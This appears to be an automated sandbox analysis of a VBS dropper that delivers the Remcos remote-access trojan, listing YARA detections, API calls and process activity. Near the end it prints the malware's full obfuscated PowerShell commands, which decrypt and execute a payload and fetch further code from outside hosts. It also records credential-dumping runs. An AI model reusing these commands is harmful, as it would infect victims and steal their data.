Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00402F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
Source: createdthingstobefrankwithmeeverywhere.gIF.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi32_7244.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7632.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/16@4/6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwbrpynw.bnu.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7244
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7632
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.2123311887.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, 00000007.00000002.2134630961.0000000002E33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: createdthingstobefrankwithmeeverywhere.gIF.vbs | Virustotal: Detection: 18%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
